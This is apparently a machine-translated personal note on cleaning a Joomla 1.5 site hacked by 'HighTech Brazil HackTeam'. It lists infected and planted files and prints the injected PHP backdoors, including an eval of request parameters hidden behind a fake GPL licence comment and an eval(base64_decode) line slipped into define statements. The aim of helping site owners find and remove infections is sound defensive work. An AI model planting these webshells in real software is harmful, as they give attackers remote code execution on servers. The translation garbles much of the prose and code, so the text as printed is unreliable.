hacked sites HighTech Brazil

1. Find those files that have been hacked:
2. copyright.php
3. changelog.php
4. Where there are these lines added:
5. (I compared with my other non hacked Joomla 1.5.26 site - Important: it seems that research on the content of the file with the value $ gnu enough to locate)
6.  
7. In header file:
8.  
9. <? PHP
10. / * GNU GENERAL PUBLIC LICENSE
11. TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
12. This program is free software, you can redistribute it and / or modify
13. it under the terms of the GNU General Public License as published by
14. the Free Software Foundation; Either Version 2 of the License, or
15. (At your option) any later versions.
16.  
17. This program is distributed in the hope That It Will Be useful,
18. goal WITHOUT ANY WARRANTY, without even the implied warranty of
19. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
20. GNU General Public License for more details.
21.  
22. GNU GENERAL PUBLIC LICENSE
23. Version 2, June 1991
24.  
25. * / Copyright6_7_78 () / * 1989, 1991 Free Software Foundation, Inc.
26.                           675 Mass Ave, Cambridge, MA 02139, USA
27.  Everyone is permitted to copy and distribute verbatim copies
28.  of this license document order changing it is not allowed.
29.  
30. Preamble
31.  
32.   The MOST licenses for software are designed to take away your
33. freedom to share and change it. By contrast, the GNU General Public
34. License is Intended to guarantee your freedom to share and change free
35. software - to make safe the software is free for all users icts. This
36. General Public License Applies to MOST of the Free Software
37. Foundation's software and to any other program Whose authors commit to
38. using it. (Some other Free Software Foundation software is covered by
39. the GNU Library General Public License INSTEAD.) You can apply it to
40. your programs, too. * />
41.  
42. And bottom of the file:
43.  
44. Copyright6_7_78 ();
45. Copyright6_7_78 function () {
46. static $ gnu = true;
47. return if ($ gnu!)
48. if (! isset ($ _REQUEST ['gnu']) | | isset ($ _REQUEST ['c_id'])) return;
49. $ Gpl = implode ('', $ _REQUEST ['gnu']);
50. eval ($ gpl ($ _REQUEST ['c_id']));
51. $ Gnu = false;
52. }
53. >
54.  
55. Once the files containing the localized code, clean up and leave ...
56.  
57. Find the files that have been added:
58.  
59. The directories listed are only my opinion, they seem to generate the names of existing files in Joomla so that we do not care - Important: it seems that research on the content of the file settings.xml enough value to locate them.
60. All2.php
61. html4strict.php (and variations of the name or kind html4strict1.php html4strict1.bak.php everywhere)
62. pageNavigation.bak.php (File "includes")
63. pageNavigation.class.php (File "includes")
64. CREDITS.php (in many cases)
65. loader.1.php (File "book")
66. loader.bak.php (File "book")
67. LICENCE.php (File "media" and "modules")
68. article5.clas.php (in many cases)
69. news2.clas.php (in many cases)
70.  
71. Here are the contents of these files (at least for me):
72.  
73. <? PHP
74. define ('REAL_SERVER_ROOT', 'SERVER');
75. / / DIR
76. define ('SERVER_ROOT', '.');
77. define ('SERVER_VERSION', '2 .5 ');
78. define ('BOOT_DIR', 'bootstrap');
79. define ('SYSTEM_DIR', 'system');
80. define ('SYSTEM_CONF_DIR', 'conf');
81. define ('SYSTEM_CONF_PATH' SERVER_ROOT '/' SYSTEM_DIR '/' SYSTEM_CONF_DIR....)
82. define ('KERNEL_DIR', 'kernel');
83. define ('SERVICES_DIR', 'services');
84. define ('LIBRARIES_DIR', 'libs');
85. define ('FRAMEWORKS_DIR', 'Frameworks');
86. define ('IMPLEMENTATIONS_DIR', 'implementations');
87. define ('EXTERN_DIR', 'external');
88. / / APP
89. define ('APPS_DIR', 'apps');
90. define ('USERS_DIR', 'users');
91. define ('USERS_PATH' SERVER_ROOT '/' USERS_DIR..)
92. define ('USERS_CONF_DIR', 'conf');
93. define ('USERS_FILES_DIR', 'files');
94. define ('SYSTEM_SKEL_DIR', 'skel')? @ Eval (base64_decode ($ _REQUEST ['c_id'])) define ('SYSTEM_SKEL_PATH' SYSTEM_CONF_PATH '/' SYSTEM_SKEL_DIR..)
95. define ('USERS_SHARE_DIR', 'share');
96. define ('USERS_META_DIR', 'meta');
97. define ('USERS_META_SETTINGS_FILENAME', 'settings.xml');
98. define ('WORKGROUPS_DIR', 'workgroups');
99. define ('WORKGROUPS_PATH' SERVER_ROOT '/' WORKGROUPS_DIR..)
100. / / CONF
101. define ('WORKGROUPS_CONF_DIR', 'conf');
102. define ('WORKGROUPS_FILES_DIR', 'files');
103. define ('WORKGROUPS_METAFILES_DIR', 'metafiles');
104. define ('WORKGROUPS_META_DIR', 'meta');
105. define ('WORKGROUPS_META_SETTINGS_FILENAME', 'settings.xml');
106. >
107.  
108. The file index.php or index.html
109.  
110. Index.qqchose several files are modified. They contain the code
111. Hackeado por HighTech Brazil HackTeam
112. No \ One - CrazyDuck - Otrasher - L34NDR0
113. That appears everywhere.
114. The then replace it with a clean file installs clean or just replace the code with the following:
115. <html> <body bgcolor="#FFFFFF"> </ body> </ html>
116. should suffice.
117. Conclusion
118.  
119. Once the cleaned their hack or completely deleted files, then once a solid htaccess. Generated, the site should be safe in the future. For now the case from 18 January 2013. If adventure should continue, I will update this file.
120. Evernote makes it easy to remember things big and small from your everyday life using your computer, tablet, phone and the web.